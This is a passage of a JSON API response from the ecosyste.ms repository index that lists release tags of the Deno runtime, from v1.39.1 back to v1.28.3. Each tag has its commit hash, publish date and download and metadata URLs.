epos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%